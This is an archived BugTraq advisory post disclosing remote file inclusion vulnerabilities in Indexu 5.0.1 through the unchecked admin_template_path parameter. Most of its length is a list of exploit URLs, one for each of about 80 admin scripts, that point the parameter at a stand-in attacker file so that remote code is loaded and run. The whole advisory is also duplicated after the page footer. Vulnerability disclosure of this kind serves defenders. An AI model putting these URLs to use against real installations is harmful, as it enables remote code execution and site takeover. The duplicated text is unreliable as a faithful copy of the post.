BugTraq
Back to list
|
Post reply
Indexu v 5.0.01 Multiple Remote File Include Vulnerabilities
Jun 16 2006 10:30AM
KARKOR23 hotmail com
Discovered By CrAsh_oVeR_rIdE
indexu remote file include
--------------------------
site of script:http://www.nicecoder.com/
-------------------------------------------------
Vulnerable: INDEXU v5.0.1
file include
------------
include($admin_template_path."msg.php");
admin_template_path parameter File inclusion
--------------------------------------------------
vulnerable files:
admin/app_change_email.php
admin/app_change_pwd.php
admin/app_mod_rewrite.php
admin/app_page_caching.php
admin/app_setup.php
admin/cat_add.php
admin/cat_delete.php
admin/cat_edit.php
admin/cat_path_update.php
admin/cat_search.php
admin/cat_struc.php
admin/cat_view.php
admin/cat_view_hidden.php
admin/cat_view_hierarchy.php
admin/cat_view_registered_only.php
admin/checkurl_web.php
admin/db_alter.php
admin/db_alter_change.php
admin/db_backup.php
admin/db_export.php
admin/db_import.php
admin/editor_add.php
admin/editor_delete.php
admin/editor_validate.php
admin/head.php
admin/index.php
admin/inv_config.php
admin/inv_config_payment.php
admin/inv_create.php
admin/inv_delete.php
admin/inv_edit.php
admin/inv_markpaid.php
admin/inv_markunpaid.php
admin/inv_overdue.php
admin/inv_paid.php
admin/inv_send.php
admin/inv_unpaid.php
admin/lang_modify.php
admin/link_add.php
admin/link_bad.php
admin/link_bad_delete.php
admin/link_checkurl.php
admin/link_delete.php
admin/link_duplicate.php
admin/link_edit.php
admin/link_premium_listing.php
admin/link_premium_sponsored.php
admin/link_search.php
admin/link_sponsored_listing.php
admin/link_validate.php
admin/link_validate_edit.php
admin/link_view.php
admin/log_search.php
admin/mail_modify.php
admin/menu.php
admin/message_create.php
admin/message_delete.php
admin/message_edit.php
admin/message_send.php
admin/message_subscriber.php
admin/message_view.php
admin/review_validate.php
admin/review_validate_edit.php
admin/summary.php
admin/template_active.php
admin/template_add_custom.php
admin/template_delete.php
admin/template_delete_file.php
admin/template_duplicate.php
admin/template_export.php
admin/template_import.php
admin/template_manager.php
admin/template_modify.php
admin/template_modify_file.php
admin/template_rename.php
admin/user_add.php
admin/user_delete.php
admin/user_edit.php
admin/user_search.php
admin/whos.php
-------------------------------------------------
example:
http://example.com/indexu/admin/app_change_email.php?admin_template_path
=http://evilcode.txt?
http://example.com/indexu/admin/app_change_pwd.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/app_mod_rewrite.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/app_page_caching.php?admin_template_path
=http://evilcode.txt?
http://example.com/indexu/admin/app_setup.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/cat_add.php?admin_template_path=http://e
vilcode.txt?
http://example.com/indexu/admin/cat_delete.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/cat_edit.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/cat_path_update.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/cat_search.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/cat_struc.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/cat_view.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/cat_view_hidden.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/cat_view_hierarchy.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/cat_view_registered_only.php?admin_templ
ate_path=http://evilcode.txt?
http://example.com/indexu/admin/checkurl_web.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/db_alter.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/db_alter_change.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/db_backup.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/db_export.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/db_import.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/editor_add.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/editor_delete.php?admin_template_path=ht
tp://evilcode.txt?
http://example.com/indexu/admin/editor_validate.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/head.php?admin_template_path=http://evil
code.txt?
http://example.com/indexu/admin/index.php?admin_template_path=http://evi
lcode.txt?
http://example.com/indexu/admin/inv_config.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/inv_config_payment.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/inv_create.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/inv_delete.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/inv_edit.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/inv_markpaid.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/inv_markunpaid.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/inv_overdue.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/inv_paid.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/inv_send.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/inv_unpaid.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/lang_modify.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/link_add.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/link_bad.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/link_bad_delete.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/link_checkurl.php?admin_template_path=ht
tp://evilcode.txt?
http://example.com/indexu/admin/link_delete.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/link_duplicate.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/link_edit.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/link_premium_listing.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/link_premium_sponsored.php?admin_templat
e_path=http://evilcode.txt?
http://example.com/indexu/admin/link_search.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/link_sponsored_listing.php?admin_templat
e_path=http://evilcode.txt?
http://example.com/indexu/admin/link_validate.php?admin_template_path=ht
tp://evilcode.txt?
http://example.com/indexu/admin/link_validate_edit.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/link_view.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/log_search.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/mail_modify.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/menu.php?admin_template_path=http://evil
code.txt?
http://example.com/indexu/admin/message_create.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/message_delete.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/message_edit.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/message_send.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/message_subscriber.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/message_view.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/review_validate.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/review_validate_edit.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/summary.php?admin_template_path=http://e
vilcode.txt?
http://example.com/indexu/admin/template_active.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_add_custom.php?admin_template_p
ath=http://evilcode.txt?
http://example.com/indexu/admin/template_delete.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_delete_file.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/template_duplicate.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/template_export.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_import.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_manager.php?admin_template_path
=http://evilcode.txt?
http://example.com/indexu/admin/template_modify.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_modify_file.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/template_rename.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/user_add.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/user_delete.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/user_edit.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/user_search.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/whos.php?admin_template_path=http://evil
code.txt?
--------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23 (at) hotmail (dot) com [email concealed]
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOK
AN3 AND ALL LEZR.COM Member
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
indexu remote file include
--------------------------
site of script:http://www.nicecoder.com/
-------------------------------------------------
Vulnerable: INDEXU v5.0.1
file include
------------
include($admin_template_path."msg.php");
admin_template_path parameter File inclusion
--------------------------------------------------
vulnerable files:
admin/app_change_email.php
admin/app_change_pwd.php
admin/app_mod_rewrite.php
admin/app_page_caching.php
admin/app_setup.php
admin/cat_add.php
admin/cat_delete.php
admin/cat_edit.php
admin/cat_path_update.php
admin/cat_search.php
admin/cat_struc.php
admin/cat_view.php
admin/cat_view_hidden.php
admin/cat_view_hierarchy.php
admin/cat_view_registered_only.php
admin/checkurl_web.php
admin/db_alter.php
admin/db_alter_change.php
admin/db_backup.php
admin/db_export.php
admin/db_import.php
admin/editor_add.php
admin/editor_delete.php
admin/editor_validate.php
admin/head.php
admin/index.php
admin/inv_config.php
admin/inv_config_payment.php
admin/inv_create.php
admin/inv_delete.php
admin/inv_edit.php
admin/inv_markpaid.php
admin/inv_markunpaid.php
admin/inv_overdue.php
admin/inv_paid.php
admin/inv_send.php
admin/inv_unpaid.php
admin/lang_modify.php
admin/link_add.php
admin/link_bad.php
admin/link_bad_delete.php
admin/link_checkurl.php
admin/link_delete.php
admin/link_duplicate.php
admin/link_edit.php
admin/link_premium_listing.php
admin/link_premium_sponsored.php
admin/link_search.php
admin/link_sponsored_listing.php
admin/link_validate.php
admin/link_validate_edit.php
admin/link_view.php
admin/log_search.php
admin/mail_modify.php
admin/menu.php
admin/message_create.php
admin/message_delete.php
admin/message_edit.php
admin/message_send.php
admin/message_subscriber.php
admin/message_view.php
admin/review_validate.php
admin/review_validate_edit.php
admin/summary.php
admin/template_active.php
admin/template_add_custom.php
admin/template_delete.php
admin/template_delete_file.php
admin/template_duplicate.php
admin/template_export.php
admin/template_import.php
admin/template_manager.php
admin/template_modify.php
admin/template_modify_file.php
admin/template_rename.php
admin/user_add.php
admin/user_delete.php
admin/user_edit.php
admin/user_search.php
admin/whos.php
-------------------------------------------------
example:
http://example.com/indexu/admin/app_change_email.php?admin_template_path
=http://evilcode.txt?
http://example.com/indexu/admin/app_change_pwd.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/app_mod_rewrite.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/app_page_caching.php?admin_template_path
=http://evilcode.txt?
http://example.com/indexu/admin/app_setup.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/cat_add.php?admin_template_path=http://e
vilcode.txt?
http://example.com/indexu/admin/cat_delete.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/cat_edit.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/cat_path_update.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/cat_search.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/cat_struc.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/cat_view.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/cat_view_hidden.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/cat_view_hierarchy.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/cat_view_registered_only.php?admin_templ
ate_path=http://evilcode.txt?
http://example.com/indexu/admin/checkurl_web.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/db_alter.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/db_alter_change.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/db_backup.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/db_export.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/db_import.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/editor_add.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/editor_delete.php?admin_template_path=ht
tp://evilcode.txt?
http://example.com/indexu/admin/editor_validate.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/head.php?admin_template_path=http://evil
code.txt?
http://example.com/indexu/admin/index.php?admin_template_path=http://evi
lcode.txt?
http://example.com/indexu/admin/inv_config.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/inv_config_payment.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/inv_create.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/inv_delete.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/inv_edit.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/inv_markpaid.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/inv_markunpaid.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/inv_overdue.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/inv_paid.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/inv_send.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/inv_unpaid.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/lang_modify.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/link_add.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/link_bad.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/link_bad_delete.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/link_checkurl.php?admin_template_path=ht
tp://evilcode.txt?
http://example.com/indexu/admin/link_delete.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/link_duplicate.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/link_edit.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/link_premium_listing.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/link_premium_sponsored.php?admin_templat
e_path=http://evilcode.txt?
http://example.com/indexu/admin/link_search.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/link_sponsored_listing.php?admin_templat
e_path=http://evilcode.txt?
http://example.com/indexu/admin/link_validate.php?admin_template_path=ht
tp://evilcode.txt?
http://example.com/indexu/admin/link_validate_edit.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/link_view.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/log_search.php?admin_template_path=http:
//evilcode.txt?
http://example.com/indexu/admin/mail_modify.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/menu.php?admin_template_path=http://evil
code.txt?
http://example.com/indexu/admin/message_create.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/message_delete.php?admin_template_path=h
ttp://evilcode.txt?
http://example.com/indexu/admin/message_edit.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/message_send.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/message_subscriber.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/message_view.php?admin_template_path=htt
p://evilcode.txt?
http://example.com/indexu/admin/review_validate.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/review_validate_edit.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/summary.php?admin_template_path=http://e
vilcode.txt?
http://example.com/indexu/admin/template_active.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_add_custom.php?admin_template_p
ath=http://evilcode.txt?
http://example.com/indexu/admin/template_delete.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_delete_file.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/template_duplicate.php?admin_template_pa
th=http://evilcode.txt?
http://example.com/indexu/admin/template_export.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_import.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_manager.php?admin_template_path
=http://evilcode.txt?
http://example.com/indexu/admin/template_modify.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/template_modify_file.php?admin_template_
path=http://evilcode.txt?
http://example.com/indexu/admin/template_rename.php?admin_template_path=
http://evilcode.txt?
http://example.com/indexu/admin/user_add.php?admin_template_path=http://
evilcode.txt?
http://example.com/indexu/admin/user_delete.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/user_edit.php?admin_template_path=http:/
/evilcode.txt?
http://example.com/indexu/admin/user_search.php?admin_template_path=http
://evilcode.txt?
http://example.com/indexu/admin/whos.php?admin_template_path=http://evil
code.txt?
--------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23 (at) hotmail (dot) com [email concealed]
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOK
AN3 AND ALL LEZR.COM Member
[ reply ]